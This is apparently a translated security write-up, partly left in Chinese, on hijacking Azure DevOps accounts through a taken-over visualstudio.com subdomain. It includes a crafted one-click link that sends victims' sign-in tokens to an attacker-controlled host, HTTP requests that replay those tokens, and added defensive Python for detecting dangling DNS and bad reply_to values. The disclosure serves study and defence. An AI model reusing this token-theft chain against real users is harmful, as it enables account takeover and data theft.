This article explains how an Azure DevOps account takeover was achieved through a domain takeover. The write-up is quite detailed, and readers interested in the topic can use it as a reference.
When testing for subdomain takeover, you normally need to understand what a hijacked domain can actually be used for, and how much real damage and impact it can cause. Recently the author took over the Microsoft developer subdomain project-cascade.visualstudio.com and used it to achieve a one-click takeover of Azure DevOps accounts. Let's take a look.
Through automated testing we found a subdomain of *.visualstudio.com, project-cascade.visualstudio.com, whose NS records point to Azure DNS, yet lookups against those nameservers are refused (Refused):
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns3-05.azure-dns.org status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns2-05.azure-dns.net status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns1-05.azure-dns.com status: [Refused]
dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns4-05.azure-dns.info status: [Refused]
The Refused status of the lookups above shows that project-cascade.visualstudio.com was delegated to Azure DNS, but no zone for it exists in Azure DNS any more. In other words, we can register (take over) this subdomain with an ordinary Azure account and then create arbitrary DNS records in it. After registration, project-cascade.visualstudio.com looked like this:
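The detection logic behind those four lookup lines, as an added example that is not code from the write-up or from the dns-takeover tool: a name is a takeover candidate when its delegation exists at the parent, every delegated nameserver belongs to a provider where any customer can create a zone, and every one of them answers REFUSED. The provider table only lists Azure DNS because that is the provider in the write-up; the healthy.example.com line is constructed to show the non-dangling case.

```python
"""Classify dangling NS delegations from dns-takeover style lookup lines.

Added example (not from the write-up or the dns-takeover tool). Parses lines of the form
    dns-takeover lookup <name>. on nameserver <ns> status: [<rcode>]
and marks a name as a takeover candidate when all delegated nameservers sit at one
known provider and all of them answer REFUSED.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^dns-takeover lookup (?P<name>\S+?)\.? on nameserver (?P<ns>\S+?)\.? "
    r"status: \[(?P<status>[A-Za-z]+)\]$"
)

# Nameserver suffixes of providers where an unclaimed zone can be created by any customer.
# Only Azure DNS is listed here (the provider in the write-up); extend as needed.
PROVIDER_NS_SUFFIXES = {
    "Azure DNS": (".azure-dns.com", ".azure-dns.net", ".azure-dns.org", ".azure-dns.info"),
}


def parse_lookup_line(line):
    """Return (name, nameserver, STATUS) for one lookup line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("name").lower(), m.group("ns").lower(), m.group("status").upper()


def provider_for(nameserver):
    """Map a nameserver hostname to a known provider name, or None if unknown."""
    for provider, suffixes in PROVIDER_NS_SUFFIXES.items():
        if nameserver.endswith(suffixes):
            return provider
    return None


def classify(lines):
    """Group lookup lines by name and return {name: (verdict, provider)}.

    "dangling": all nameservers at one known provider and all answered REFUSED.
    "partial":  some nameservers answered REFUSED (worth a manual look).
    "ok":       nobody refused the query.
    """
    answers = defaultdict(list)
    for line in lines:
        parsed = parse_lookup_line(line)
        if parsed:
            name, ns, status = parsed
            answers[name].append((ns, status))

    verdicts = {}
    for name, entries in answers.items():
        providers = {provider_for(ns) for ns, _ in entries}
        statuses = {status for _, status in entries}
        provider = providers.pop() if len(providers) == 1 else None
        if statuses == {"REFUSED"} and provider is not None:
            verdicts[name] = ("dangling", provider)
        elif "REFUSED" in statuses:
            verdicts[name] = ("partial", provider)
        else:
            verdicts[name] = ("ok", provider)
    return verdicts


# The four lookup lines from the write-up, plus one constructed healthy delegation.
SAMPLE_LINES = [
    "dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns3-05.azure-dns.org status: [Refused]",
    "dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns2-05.azure-dns.net status: [Refused]",
    "dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns1-05.azure-dns.com status: [Refused]",
    "dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns4-05.azure-dns.info status: [Refused]",
    # constructed: a zone that is really hosted answers NOERROR, not REFUSED
    "dns-takeover lookup healthy.example.com. on nameserver ns1-01.azure-dns.com status: [NoError]",
]

if __name__ == "__main__":
    for name, (verdict, provider) in classify(SAMPLE_LINES).items():
        print(f"{name}: {verdict} ({provider})")
```

The "partial" verdict exists because a mixed set of answers (one REFUSED, others fine) usually means a misconfigured or migrating zone rather than an unclaimed one, and should be triaged by hand rather than treated as a finding.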
Next, we added two records to the zone:
- TXT record: txt.project-cascade.visualstudio.com (carrying the note "Azure DNS Zone Takeover POC")
- A record: arec.project-cascade.visualstudio.com (pointing to an IP address we control, 3.88.203.203)
Verifying with dig:
$ dig txt txt.project-cascade.visualstudio.com @1.1.1.1
...omitted for brevity...
;; ANSWER SECTION:
txt.project-cascade.visualstudio.com. 10 IN TXT "Azure DNS Zone Takeover POC"

$ dig a arec.project-cascade.visualstudio.com @1.1.1.1
...omitted for brevity...
;; ANSWER SECTION:
arec.project-cascade.visualstudio.com. 2475 IN A 3.88.203.203
So we have taken over project-cascade.visualstudio.com. Now let's look at the concrete harm this can cause.
We noticed that some subdomains under visualstudio.com authenticate through login.microsoftonline.com. For example, visiting app.vssps.visualstudio.com triggers the following redirect to login.microsoftonline.com:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90#ctx=eyJTaWduSW5Db29raWVEb21haW5zIjpbImh0dHBzOi8vbG9naW4ubWljcm8zb2Z0b25saW5lLmNvbSJdfQ2
The browser is then sent to https://login.microsoftonline.com/...omitted... for authentication.
The two most important parts of this redirect-based authentication flow are:
https://app.vssps.visualstudio.com/_signin:
reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F
Testing showed that the check on this domain is fairly loose: any *.visualstudio.com subdomain is allowed to receive the authentication token. To verify this we constructed the following test URL:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90
In this URL we changed the original reply_to value to our controlled subdomain, https://arec.project-cascade.visualstudio.com/ (URL-encoded). Visiting the link still leads to the normal Microsoft live.com login page, and if the user is already logged in, the redirect is carried out straight away:
If a victim visits this link while logged in, the redirect sequence issues a POST carrying the authentication tokens, with the realm set to our controlled domain arec.project-cascade.visualstudio.com:
POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1
Host: arec.vssps.visualstudio.com
Cookie: ...omitted for brevity...

id_token=<snip>&FedAuth=<snip>&FedAuth2=<snip>%2B
Our controlled host arec.project-cascade.visualstudio.com then receives a follow-on POST (referred from the arec.vssps.visualstudio.com/_signedin handler) that contains the victim's authentication tokens for app.vsaex.visualstudio.com:
POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1
Host: arec.project-cascade.visualstudio.com
Content-Length: 4634
Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F
Cookie: ...omitted for brevity...

id_token=<snip>&FedAuth=<snip>&FedAuth2=<snip>
With the tokens obtained this way, we can authenticate to the legitimate domains vsaex.visualstudio.com, dev.azure.com and vssps.dev.azure.com, obtaining valid sessions and hijacking those accounts. Taking app.vsaex.visualstudio.com as an example, we send an authentication request carrying the stolen tokens:
POST /_apis/WebPlatformAuth/SessionToken HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
Content-Length: 105
Origin: https://app.vsaex.visualstudio.com
X-VSS-ReauthenticationAction: Suppress
Content-Type: application/json
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
X-Requested-With: XMLHttpRequest
...omitted for brevity...
Cookie: UserAuthentication=<snipped id_token>; FedAuth=<snipped FedAuth>; FedAuth2=<snipped>

{"appId":"00000000-0000-0000-0000-000000000000","force":false,"tokenType":0,"namedTokenId":"Aex.Profile"}
之后,服務端會響應回另一個app.vsaex.visualstudio.com分配的用戶有效token:
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 933
Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1
...omitted for brevity...

{"appId":"00000000-0000-0000-0000-000000000000","token":"<snip>","tokenType":"session","validTo":"2020-05-12T06:45:47.2007474Z","namedTokenId":"Aex.Profile"}
With this token we can retrieve the user's email address from app.vsaex.visualstudio.com. Request:
GET /_apis/User/User HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
X-TFS-FedAuthRedirect: Suppress
X-VSS-ReauthenticationAction: Suppress
X-Requested-With: XMLHttpRequest
Accept-Language: en-US
Authorization: Bearer <snip just received bearer token>
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2b
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://app.vsaex.visualstudio.com/me?mkt=en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 258
...omitted for brevity...

{"descriptor":"msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1","displayName":"s","mail":"<account_email>","unconfirmedMail":null,"country":"AU","dateCreated":"2018-05-25T23:19:53.6843383+00:00","lastModified":"2019-01-06T15:43:50.2963651+00:00","revision":0}
With the same stolen token, the page https://app.vsaex.visualstudio.com/me?mkt=en-US also lists the user's development projects on dev.azure.com:
And finally, the user's project resources hosted on dev.azure.com can be accessed. Request:
GET /seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1
Host: dev.azure.com
Connection: close
x-tfs-fedauthredirect: Suppress
Origin: https://dev.azure.com
x-vss-reauthenticationaction: Suppress
authorization: Bearer <snip>
accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
A malicious attacker could therefore send the following link to an unsuspecting victim and take over the victim's account with a single click:
https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90
Once the attacker holds an access token for app.vsaex.visualstudio.com, the victim's Azure DevOps account is fully compromised.
In addition, control of project-cascade.visualstudio.com would also allow MX records to be set to receive mail for *.project-cascade.visualstudio.com, and even SSL certificates to be issued, enabling impersonation of Microsoft services.
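The root cause on the sign-in side is the loose reply_to check described above, and the one-click link is what a defender would want to spot in access logs. The following added example (not code from the write-up or from Microsoft) puts the permissive suffix check next to an exact allow-list, then runs the strict check over constructed web-server log lines for the /_signin endpoint. The allow-list hosts are assumed for illustration, and the IPs and timestamps in the sample log are made up.

```python
"""Validate a sign-in reply_to parameter and flag abuse of it in access logs.

Added example (not from the write-up or from Microsoft). The weak check accepts any
*.visualstudio.com host, which is what let the taken-over subdomain receive tokens;
the strict check only accepts named first-party hosts over https with no userinfo
or port. The log scanner applies the strict check to /_signin requests.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allow-list of first-party hosts permitted to receive sign-in tokens.
ALLOWED_REPLY_HOSTS = frozenset({
    "app.vsaex.visualstudio.com",
    "dev.azure.com",
    "vssps.dev.azure.com",
})


def reply_to_host(reply_to):
    """Return the lowercase hostname of reply_to, or None if it is not a clean https URL."""
    try:
        parts = urlsplit(reply_to)
        # Accessing .port raises ValueError on a malformed port; treat that as invalid.
        port = parts.port
    except ValueError:
        return None
    if parts.scheme != "https" or parts.hostname is None:
        return None
    # Reject userinfo (https://app.vsaex.visualstudio.com@evil.example/) and explicit ports.
    if parts.username is not None or port is not None:
        return None
    return parts.hostname.lower()


def reply_to_allowed_weak(reply_to):
    """Suffix check of the kind the write-up describes: any *.visualstudio.com host passes."""
    host = reply_to_host(reply_to)
    return host is not None and host.endswith(".visualstudio.com")


def reply_to_allowed_strict(reply_to):
    """Exact allow-list: only named first-party hosts may receive tokens."""
    return reply_to_host(reply_to) in ALLOWED_REPLY_HOSTS


# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_signin_requests(log_lines):
    """Return [(client_ip, reply_to)] for /_signin requests whose reply_to fails the strict check."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith("/_signin?"):
            continue
        params = parse_qs(urlsplit(m.group("path")).query)  # parse_qs percent-decodes values
        for reply_to in params.get("reply_to", []):
            if not reply_to_allowed_strict(reply_to):
                findings.append((m.group("ip"), reply_to))
    return findings


# Constructed sample log lines; the second carries the reply_to host from the write-up.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/May/2020:10:00:01 +0000] "GET /_signin?realm=app.vsaex.visualstudio.com'
    '&reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F&redirect=1 HTTP/1.1" 302 -',
    '198.51.100.7 - - [11/May/2020:10:00:02 +0000] "GET /_signin?realm=app.vsaex.visualstudio.com'
    '&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1 HTTP/1.1" 302 -',
    '198.51.100.9 - - [11/May/2020:10:00:03 +0000] "GET /healthz HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for ip, reply_to in suspicious_signin_requests(SAMPLE_LOG):
        print(f"suspicious reply_to from {ip}: {reply_to}")
```

The strict variant deliberately refuses anything it cannot parse cleanly rather than falling back to a suffix match, because a redirect target is a trust decision: a host that is not on the list gets no token, whatever domain it sits under.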
重新注冊域名project-cascade.visualstudio.com,獲得對其控制權
限制app.vssps.visualstudio.com中reply_to產生的token對域app.vsaex.visualstudio.com的訪問
關于怎么通過域名劫持實現Azure DevOps賬戶劫持就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。